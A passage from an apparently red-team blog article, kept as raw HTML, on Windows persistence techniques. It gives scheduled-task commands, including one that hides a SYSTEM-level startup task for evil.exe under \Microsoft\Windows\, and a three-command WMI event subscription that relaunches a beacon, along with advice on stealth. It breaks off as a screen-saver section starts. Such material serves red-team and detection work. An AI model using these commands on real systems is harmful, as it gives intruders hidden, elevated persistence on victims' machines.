    &lt;span class="o"&gt;==&amp;gt;&lt;/span&gt; &lt;span class="kd"&gt;Create&lt;/span&gt; &lt;span class="kd"&gt;a&lt;/span&gt; &lt;span class="kd"&gt;scheduled&lt;/span&gt; &lt;span class="kd"&gt;task&lt;/span&gt; &lt;span class="s2"&gt;"doc"&lt;/span&gt; &lt;span class="na"&gt;on&lt;/span&gt; &lt;span class="kd"&gt;remote&lt;/span&gt; &lt;span class="kd"&gt;machine&lt;/span&gt; &lt;span class="s2"&gt;"ABC"&lt;/span&gt; &lt;span class="kd"&gt;that&lt;/span&gt; &lt;span class="kd"&gt;runs&lt;/span&gt; &lt;span class="kd"&gt;notepad&lt;/span&gt;&lt;span class="err"&gt;.exe&lt;/span&gt; &lt;span class="kd"&gt;hourly&lt;/span&gt; &lt;span class="kd"&gt;under&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="s2"&gt;"runasuser"&lt;/span&gt; &lt;span class="kd"&gt;account&lt;/span&gt;.
        &lt;span class="kd"&gt;SCHTASKS&lt;/span&gt; &lt;span class="na"&gt;/Create /S &lt;/span&gt;&lt;span class="kd"&gt;ABC&lt;/span&gt; &lt;span class="na"&gt;/U &lt;/span&gt;&lt;span class="kd"&gt;user&lt;/span&gt; &lt;span class="na"&gt;/P &lt;/span&gt;&lt;span class="kd"&gt;password&lt;/span&gt; &lt;span class="na"&gt;/RU &lt;/span&gt;&lt;span class="kd"&gt;runasuser&lt;/span&gt; &lt;span class="na"&gt;/RP &lt;/span&gt;&lt;span class="kd"&gt;runaspassword&lt;/span&gt; &lt;span class="na"&gt;/SC &lt;/span&gt;&lt;span class="kd"&gt;HOURLY&lt;/span&gt; &lt;span class="na"&gt;/TN &lt;/span&gt;&lt;span class="kd"&gt;doc&lt;/span&gt; &lt;span class="na"&gt;/TR &lt;/span&gt;&lt;span class="kd"&gt;notepad&lt;/span&gt;

    &lt;span class="o"&gt;==&amp;gt;&lt;/span&gt; &lt;span class="kd"&gt;Create&lt;/span&gt; &lt;span class="kd"&gt;a&lt;/span&gt; &lt;span class="kd"&gt;scheduled&lt;/span&gt; &lt;span class="kd"&gt;task&lt;/span&gt; &lt;span class="s2"&gt;"accountant"&lt;/span&gt; &lt;span class="na"&gt;on&lt;/span&gt; &lt;span class="kd"&gt;remote&lt;/span&gt; &lt;span class="kd"&gt;machine&lt;/span&gt; &lt;span class="s2"&gt;"ABC"&lt;/span&gt; &lt;span class="kd"&gt;that&lt;/span&gt; &lt;span class="kd"&gt;runs&lt;/span&gt; &lt;span class="kd"&gt;calc&lt;/span&gt;&lt;span class="err"&gt;.exe&lt;/span&gt; &lt;span class="kd"&gt;every&lt;/span&gt; &lt;span class="kd"&gt;five&lt;/span&gt; &lt;span class="kd"&gt;minutes&lt;/span&gt; &lt;span class="kd"&gt;between&lt;/span&gt; &lt;span class="kd"&gt;a&lt;/span&gt; &lt;span class="nb"&gt;start&lt;/span&gt; &lt;span class="kd"&gt;and&lt;/span&gt; &lt;span class="kd"&gt;end&lt;/span&gt; &lt;span class="nb"&gt;time&lt;/span&gt; &lt;span class="na"&gt;on&lt;/span&gt; &lt;span class="kd"&gt;specified&lt;/span&gt; &lt;span class="kd"&gt;dates&lt;/span&gt;.
        &lt;span class="kd"&gt;SCHTASKS&lt;/span&gt; &lt;span class="na"&gt;/Create /S &lt;/span&gt;&lt;span class="kd"&gt;ABC&lt;/span&gt; &lt;span class="na"&gt;/U &lt;/span&gt;&lt;span class="kd"&gt;domain&lt;/span&gt;\user &lt;span class="na"&gt;/P &lt;/span&gt;&lt;span class="kd"&gt;password&lt;/span&gt; &lt;span class="na"&gt;/SC &lt;/span&gt;&lt;span class="kd"&gt;MINUTE&lt;/span&gt; &lt;span class="na"&gt;/MO &lt;/span&gt;&lt;span class="m"&gt;5&lt;/span&gt; &lt;span class="na"&gt;/TN &lt;/span&gt;&lt;span class="kd"&gt;accountant&lt;/span&gt; &lt;span class="na"&gt;/TR &lt;/span&gt;&lt;span class="kd"&gt;calc&lt;/span&gt;&lt;span class="err"&gt;.exe&lt;/span&gt; &lt;span class="na"&gt;/ST &lt;/span&gt;&lt;span class="m"&gt;12&lt;/span&gt;:00 &lt;span class="na"&gt;/ET &lt;/span&gt;&lt;span class="m"&gt;14&lt;/span&gt;:00 &lt;span class="na"&gt;/SD &lt;/span&gt;&lt;span class="m"&gt;06&lt;/span&gt;/06/2006 &lt;span class="na"&gt;/ED &lt;/span&gt;&lt;span class="m"&gt;06&lt;/span&gt;/06/2006 &lt;span class="na"&gt;/RU &lt;/span&gt;&lt;span class="kd"&gt;runasuser&lt;/span&gt; &lt;span class="na"&gt;/RP &lt;/span&gt;&lt;span class="kd"&gt;userpassword&lt;/span&gt;

    &lt;span class="o"&gt;==&amp;gt;&lt;/span&gt; &lt;span class="kd"&gt;Create&lt;/span&gt; &lt;span class="kd"&gt;a&lt;/span&gt; &lt;span class="kd"&gt;scheduled&lt;/span&gt; &lt;span class="kd"&gt;task&lt;/span&gt; &lt;span class="s2"&gt;"gametime"&lt;/span&gt; &lt;span class="kd"&gt;that&lt;/span&gt; &lt;span class="kd"&gt;runs&lt;/span&gt; &lt;span class="kd"&gt;FreeCell&lt;/span&gt; &lt;span class="na"&gt;on&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;first&lt;/span&gt; &lt;span class="kd"&gt;Sunday&lt;/span&gt; &lt;span class="kd"&gt;of&lt;/span&gt; &lt;span class="kd"&gt;every&lt;/span&gt; &lt;span class="kd"&gt;month&lt;/span&gt;.
        &lt;span class="kd"&gt;SCHTASKS&lt;/span&gt; &lt;span class="na"&gt;/Create /SC &lt;/span&gt;&lt;span class="kd"&gt;MONTHLY&lt;/span&gt; &lt;span class="na"&gt;/MO &lt;/span&gt;&lt;span class="kd"&gt;first&lt;/span&gt; &lt;span class="na"&gt;/D &lt;/span&gt;&lt;span class="kd"&gt;SUN&lt;/span&gt; &lt;span class="na"&gt;/TN &lt;/span&gt;&lt;span class="kd"&gt;gametime&lt;/span&gt; &lt;span class="na"&gt;/TR &lt;/span&gt;&lt;span class="kd"&gt;c&lt;/span&gt;:\windows\system32\freecell

    &lt;span class="o"&gt;==&amp;gt;&lt;/span&gt; &lt;span class="kd"&gt;Create&lt;/span&gt; &lt;span class="kd"&gt;a&lt;/span&gt; &lt;span class="kd"&gt;scheduled&lt;/span&gt; &lt;span class="kd"&gt;task&lt;/span&gt; &lt;span class="s2"&gt;"report"&lt;/span&gt; &lt;span class="na"&gt;on&lt;/span&gt; &lt;span class="kd"&gt;remote&lt;/span&gt; &lt;span class="kd"&gt;machine&lt;/span&gt; &lt;span class="s2"&gt;"ABC"&lt;/span&gt; &lt;span class="kd"&gt;that&lt;/span&gt; &lt;span class="kd"&gt;runs&lt;/span&gt; &lt;span class="kd"&gt;notepad&lt;/span&gt;&lt;span class="err"&gt;.exe&lt;/span&gt; &lt;span class="kd"&gt;every&lt;/span&gt; &lt;span class="kd"&gt;week&lt;/span&gt;.
        &lt;span class="kd"&gt;SCHTASKS&lt;/span&gt; &lt;span class="na"&gt;/Create /S &lt;/span&gt;&lt;span class="kd"&gt;ABC&lt;/span&gt; &lt;span class="na"&gt;/U &lt;/span&gt;&lt;span class="kd"&gt;user&lt;/span&gt; &lt;span class="na"&gt;/P &lt;/span&gt;&lt;span class="kd"&gt;password&lt;/span&gt; &lt;span class="na"&gt;/RU &lt;/span&gt;&lt;span class="kd"&gt;runasuser&lt;/span&gt; &lt;span class="na"&gt;/RP &lt;/span&gt;&lt;span class="kd"&gt;runaspassword&lt;/span&gt; &lt;span class="na"&gt;/SC &lt;/span&gt;&lt;span class="kd"&gt;WEEKLY&lt;/span&gt; &lt;span class="na"&gt;/TN &lt;/span&gt;&lt;span class="kd"&gt;report&lt;/span&gt; &lt;span class="na"&gt;/TR &lt;/span&gt;&lt;span class="kd"&gt;notepad&lt;/span&gt;&lt;span class="err"&gt;.exe&lt;/span&gt;

    &lt;span class="o"&gt;==&amp;gt;&lt;/span&gt; &lt;span class="kd"&gt;Create&lt;/span&gt; &lt;span class="kd"&gt;a&lt;/span&gt; &lt;span class="kd"&gt;scheduled&lt;/span&gt; &lt;span class="kd"&gt;task&lt;/span&gt; &lt;span class="s2"&gt;"logtracker"&lt;/span&gt; &lt;span class="na"&gt;on&lt;/span&gt; &lt;span class="kd"&gt;remote&lt;/span&gt; &lt;span class="kd"&gt;machine&lt;/span&gt; &lt;span class="s2"&gt;"ABC"&lt;/span&gt; &lt;span class="kd"&gt;that&lt;/span&gt; &lt;span class="kd"&gt;runs&lt;/span&gt; &lt;span class="kd"&gt;notepad&lt;/span&gt;&lt;span class="err"&gt;.exe&lt;/span&gt; &lt;span class="kd"&gt;every&lt;/span&gt; &lt;span class="kd"&gt;five&lt;/span&gt; &lt;span class="kd"&gt;minutes&lt;/span&gt; &lt;span class="kd"&gt;from&lt;/span&gt; &lt;span class="kd"&gt;a&lt;/span&gt; &lt;span class="kd"&gt;specified&lt;/span&gt; &lt;span class="nb"&gt;start&lt;/span&gt; &lt;span class="nb"&gt;time&lt;/span&gt; &lt;span class="kd"&gt;with&lt;/span&gt; &lt;span class="kd"&gt;no&lt;/span&gt; &lt;span class="kd"&gt;end&lt;/span&gt; &lt;span class="nb"&gt;time&lt;/span&gt;&lt;span class="o"&gt;;&lt;/span&gt; &lt;span class="kd"&gt;password&lt;/span&gt; &lt;span class="nb"&gt;prompt&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="na"&gt;/RP&lt;/span&gt;.
        &lt;span class="kd"&gt;SCHTASKS&lt;/span&gt; &lt;span class="na"&gt;/Create /S &lt;/span&gt;&lt;span class="kd"&gt;ABC&lt;/span&gt; &lt;span class="na"&gt;/U &lt;/span&gt;&lt;span class="kd"&gt;domain&lt;/span&gt;\user &lt;span class="na"&gt;/P &lt;/span&gt;&lt;span class="kd"&gt;password&lt;/span&gt; &lt;span class="na"&gt;/SC &lt;/span&gt;&lt;span class="kd"&gt;MINUTE&lt;/span&gt; &lt;span class="na"&gt;/MO &lt;/span&gt;&lt;span class="m"&gt;5&lt;/span&gt; &lt;span class="na"&gt;/TN &lt;/span&gt;&lt;span class="kd"&gt;logtracker&lt;/span&gt; &lt;span class="na"&gt;/TR &lt;/span&gt;&lt;span class="kd"&gt;c&lt;/span&gt;:\windows\system32\notepad.exe &lt;span class="na"&gt;/ST &lt;/span&gt;&lt;span class="m"&gt;18&lt;/span&gt;:30 &lt;span class="na"&gt;/RU &lt;/span&gt;&lt;span class="kd"&gt;runasuser&lt;/span&gt; &lt;span class="na"&gt;/RP

    &lt;/span&gt;&lt;span class="o"&gt;==&amp;gt;&lt;/span&gt; &lt;span class="kd"&gt;Create&lt;/span&gt; &lt;span class="kd"&gt;a&lt;/span&gt; &lt;span class="kd"&gt;scheduled&lt;/span&gt; &lt;span class="kd"&gt;task&lt;/span&gt; &lt;span class="s2"&gt;"gaming"&lt;/span&gt; &lt;span class="kd"&gt;that&lt;/span&gt; &lt;span class="kd"&gt;runs&lt;/span&gt; &lt;span class="kd"&gt;freecell&lt;/span&gt;&lt;span class="err"&gt;.exe&lt;/span&gt; &lt;span class="kd"&gt;daily&lt;/span&gt; &lt;span class="kd"&gt;from&lt;/span&gt; &lt;span class="m"&gt;12&lt;/span&gt;:00 &lt;span class="kd"&gt;to&lt;/span&gt; &lt;span class="m"&gt;14&lt;/span&gt;:00 &lt;span class="kd"&gt;and&lt;/span&gt; &lt;span class="kd"&gt;ends&lt;/span&gt; &lt;span class="kd"&gt;automatically&lt;/span&gt;.
        &lt;span class="kd"&gt;SCHTASKS&lt;/span&gt; &lt;span class="na"&gt;/Create /SC &lt;/span&gt;&lt;span class="kd"&gt;DAILY&lt;/span&gt; &lt;span class="na"&gt;/TN &lt;/span&gt;&lt;span class="kd"&gt;gaming&lt;/span&gt; &lt;span class="na"&gt;/TR &lt;/span&gt;&lt;span class="kd"&gt;c&lt;/span&gt;:\freecell &lt;span class="na"&gt;/ST &lt;/span&gt;&lt;span class="m"&gt;12&lt;/span&gt;:00 &lt;span class="na"&gt;/ET &lt;/span&gt;&lt;span class="m"&gt;14&lt;/span&gt;:00 &lt;span class="na"&gt;/K

    &lt;/span&gt;&lt;span class="o"&gt;==&amp;gt;&lt;/span&gt; &lt;span class="kd"&gt;Create&lt;/span&gt; &lt;span class="kd"&gt;a&lt;/span&gt; &lt;span class="kd"&gt;scheduled&lt;/span&gt; &lt;span class="kd"&gt;task&lt;/span&gt; &lt;span class="s2"&gt;"EventLog"&lt;/span&gt; &lt;span class="kd"&gt;to&lt;/span&gt; &lt;span class="nb"&gt;start&lt;/span&gt; &lt;span class="kd"&gt;wevtvwr&lt;/span&gt;.msc &lt;span class="kd"&gt;whenever&lt;/span&gt; &lt;span class="kd"&gt;event&lt;/span&gt; &lt;span class="m"&gt;101&lt;/span&gt; &lt;span class="kd"&gt;is&lt;/span&gt; &lt;span class="kd"&gt;published&lt;/span&gt; &lt;span class="k"&gt;in&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="s2"&gt;"System"&lt;/span&gt; &lt;span class="kd"&gt;channel&lt;/span&gt;.
        &lt;span class="kd"&gt;SCHTASKS&lt;/span&gt; &lt;span class="na"&gt;/Create /TN &lt;/span&gt;&lt;span class="kd"&gt;EventLog&lt;/span&gt; &lt;span class="na"&gt;/TR &lt;/span&gt;&lt;span class="kd"&gt;wevtvwr&lt;/span&gt;.msc &lt;span class="na"&gt;/SC &lt;/span&gt;&lt;span class="kd"&gt;ONEVENT&lt;/span&gt; &lt;span class="na"&gt;/EC &lt;/span&gt;&lt;span class="kd"&gt;System&lt;/span&gt; &lt;span class="na"&gt;/MO &lt;/span&gt;&lt;span class="o"&gt;*[&lt;/span&gt;&lt;span class="kd"&gt;System&lt;/span&gt;&lt;span class="na"&gt;/EventID&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="m"&gt;101&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt;

    &lt;span class="o"&gt;==&amp;gt;&lt;/span&gt; &lt;span class="kd"&gt;File&lt;/span&gt; &lt;span class="kd"&gt;paths&lt;/span&gt; &lt;span class="kd"&gt;may&lt;/span&gt; &lt;span class="kd"&gt;contain&lt;/span&gt; &lt;span class="kd"&gt;spaces&lt;/span&gt;&lt;span class="o"&gt;;&lt;/span&gt; &lt;span class="kd"&gt;use&lt;/span&gt; &lt;span class="kd"&gt;two&lt;/span&gt; &lt;span class="kd"&gt;sets&lt;/span&gt; &lt;span class="kd"&gt;of&lt;/span&gt; &lt;span class="kd"&gt;quotes&lt;/span&gt;—one &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="kd"&gt;CMD&lt;/span&gt;&lt;span class="err"&gt;.EXE&lt;/span&gt; &lt;span class="kd"&gt;and&lt;/span&gt; &lt;span class="kd"&gt;one&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="kd"&gt;SchTasks&lt;/span&gt;&lt;span class="err"&gt;.exe&lt;/span&gt;. &lt;span class="kd"&gt;The&lt;/span&gt; &lt;span class="kd"&gt;outer&lt;/span&gt; &lt;span class="kd"&gt;quotes&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="kd"&gt;CMD&lt;/span&gt; &lt;span class="kd"&gt;must&lt;/span&gt; &lt;span class="kd"&gt;be&lt;/span&gt; &lt;span class="kd"&gt;double&lt;/span&gt; &lt;span class="kd"&gt;quotes&lt;/span&gt;&lt;span class="o"&gt;;&lt;/span&gt; &lt;span class="kd"&gt;inner&lt;/span&gt; &lt;span class="kd"&gt;quotes&lt;/span&gt; &lt;span class="kd"&gt;can&lt;/span&gt; &lt;span class="kd"&gt;be&lt;/span&gt; &lt;span class="kd"&gt;single&lt;/span&gt; &lt;span class="kd"&gt;or&lt;/span&gt; &lt;span class="kd"&gt;escaped&lt;/span&gt; &lt;span class="kd"&gt;double&lt;/span&gt; &lt;span class="kd"&gt;quotes&lt;/span&gt;:
        &lt;span class="kd"&gt;SCHTASKS&lt;/span&gt; &lt;span class="na"&gt;/Create /tr &lt;/span&gt;&lt;span class="s2"&gt;"'c:\program files\internet explorer\iexplorer.exe' \"&lt;/span&gt;&lt;span class="kd"&gt;c&lt;/span&gt;:\log &lt;span class="kd"&gt;data&lt;/span&gt;\today.xml\&lt;span class="s2"&gt;""&lt;/span&gt; ...
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The "Task Scheduler Library" contains folders. In a pristine Windows installation, there are no scheduled tasks in the root directory, as shown:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Facyvs1577fkm94w3g7jq.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Facyvs1577fkm94w3g7jq.png" alt=" " width="800" height="335"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Naturally, subdirectories are also empty:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0hf7pd7efkwh9d4qyd4o.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0hf7pd7efkwh9d4qyd4o.png" alt=" " width="800" height="270"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fcqk2rnx8u8lf253wzvgx.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fcqk2rnx8u8lf253wzvgx.png" alt=" " width="800" height="347"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;All built‑in tasks reside deep within nested folders. To maintain stealth, it is advisable to adhere to the default Windows convention by creating our own subdirectory and task under &lt;code&gt;\Microsoft\Windows\&lt;/code&gt;. Example command:&lt;/p&gt;

&lt;p&gt;&lt;code&gt;SCHTASKS /Create /RU SYSTEM /SC ONSTART /RL HIGHEST /TN \Microsoft\Windows\evil\eviltask /TR C:\Users\hunter\Desktop\evil.exe&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;A beacon is received without requiring user logon:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F81grdukopp6u725bakfp.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F81grdukopp6u725bakfp.png" alt=" " width="800" height="402"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;In the process tree, the malicious process is spawned by &lt;code&gt;taskeng.exe&lt;/code&gt;, the Task Scheduler engine. Its stealth is inferior to DLL services but superior to auto‑start registry keys.&lt;br&gt;&lt;br&gt;
However, another significant issue emerges: the &lt;code&gt;SCHTASKS&lt;/code&gt; command has incomplete functionality. Many configuration options cannot be manipulated, such as adding multiple triggers simultaneously or modifying settings in the "Conditions" and "Settings" tabs, as shown below:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F58afr39kavd2bw64l3jx.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F58afr39kavd2bw64l3jx.png" alt=" " width="799" height="490"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Figyig95qddxmbwd86b1u.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Figyig95qddxmbwd86b1u.png" alt=" " width="800" height="670"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;These options remain at their creation defaults, meaning our scheduled task will not start upon wake from sleep, will stop when AC power is disconnected, and will automatically cease after three days. Yet these advanced settings cannot be configured via command line. A search of the Microsoft community yielded the following official response:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fge3acras554txd6iqqqi.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fge3acras554txd6iqqqi.png" alt=" " width="798" height="175"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;It is both amusing and frustrating. For normal users, this is unproblematic, but for red teams, manipulating the GUI is inconvenient. While one could craft a DLL module or executable that directly calls the Win32 API to modify these settings, that requires uploading an additional file, reducing efficiency. Therefore, scheduled task persistence can serve only as a fallback measure, not a fully reliable method.&lt;br&gt;&lt;br&gt;
A somewhat similar vector is Group Policy. Startup scripts can execute cmd or PowerShell scripts to run arbitrary commands, but because the command‑line version of the Group Policy Editor is far too limited, it will not be expanded upon here. (If desktop access is available, configuring a startup script directly via &lt;code&gt;gpedit.msc&lt;/code&gt; achieves persistence with relatively high stealth.)&lt;/p&gt;
&lt;h2&gt;
  
  
  0x05 WMI
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Required Privileges:&lt;/strong&gt; Administrator privileges without UAC reduction.&lt;br&gt;&lt;br&gt;
WMI can be regarded as a set of APIs that interact directly with the Windows operating system. Being a native tool that requires no installation, it is also a valuable aid for persistence.&lt;br&gt;&lt;br&gt;
Because WMI events execute in a loop, to avoid spawning countless shells, one can restrict execution using the system uptime (as long as the trigger delay falls within the specified window; some machines boot slowly, so the start time should be set higher). Example commands:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight batchfile"&gt;&lt;code&gt;&lt;span class="nb"&gt;wmic&lt;/span&gt; &lt;span class="na"&gt;/NAMESPACE&lt;/span&gt;:&lt;span class="s2"&gt;"\\root\subscription"&lt;/span&gt; &lt;span class="kd"&gt;PATH&lt;/span&gt; __EventFilter &lt;span class="kd"&gt;CREATE&lt;/span&gt; &lt;span class="kd"&gt;Name&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"evil"&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;EventNameSpace&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"root\cimv2"&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt;&lt;span class="kd"&gt;QueryLanguage&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"WQL"&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;Query&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime &amp;gt;= 240 AND TargetInstance.SystemUpTime &amp;lt; 310"&lt;/span&gt;

&lt;span class="nb"&gt;wmic&lt;/span&gt; &lt;span class="na"&gt;/NAMESPACE&lt;/span&gt;:&lt;span class="s2"&gt;"\\root\subscription"&lt;/span&gt; &lt;span class="kd"&gt;PATH&lt;/span&gt; &lt;span class="kd"&gt;CommandLineEventConsumer&lt;/span&gt; &lt;span class="kd"&gt;CREATE&lt;/span&gt; &lt;span class="kd"&gt;Name&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"evilConsumer"&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;ExecutablePath&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"C:\Users\hunter\Desktop\beacon.exe"&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt;&lt;span class="kd"&gt;CommandLineTemplate&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"C:\Users\hunter\Desktop\beacon.exe"&lt;/span&gt;

&lt;span class="nb"&gt;wmic&lt;/span&gt; &lt;span class="na"&gt;/NAMESPACE&lt;/span&gt;:&lt;span class="s2"&gt;"\\root\subscription"&lt;/span&gt; &lt;span class="kd"&gt;PATH&lt;/span&gt; __FilterToConsumerBinding &lt;span class="kd"&gt;CREATE&lt;/span&gt; &lt;span class="kd"&gt;Filter&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"__EventFilter.Name=\"&lt;/span&gt;&lt;span class="kd"&gt;evil&lt;/span&gt;\&lt;span class="s2"&gt;""&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;Consumer&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"CommandLineEventConsumer.Name=\"&lt;/span&gt;&lt;span class="kd"&gt;evilConsumer&lt;/span&gt;\&lt;span class="s2"&gt;""&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Due to possible variations in the exact timing window, multiple beacons may appear in certain circumstances:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgq6a0v11c2b17m55u3x2.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgq6a0v11c2b17m55u3x2.png" alt=" " width="800" height="82"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Inspecting the process tree reveals moderate stealth:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fcymgee1zn4x8btj12747.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fcymgee1zn4x8btj12747.png" alt=" " width="800" height="267"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  0x06 Screen Saver
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Required Privileges:&lt;/strong&gt; Standard user.&lt;br&gt;&lt;br&gt;
Although not all users employ a screen saver, the relevant configuration is conveniently stored in the registry, as shown in the four keys below:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F26lbjqtf5ihuooi1s4yo.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F26lbjqtf5ihuooi1s4yo.png" alt=" " width="729" height="249"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Full paths:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
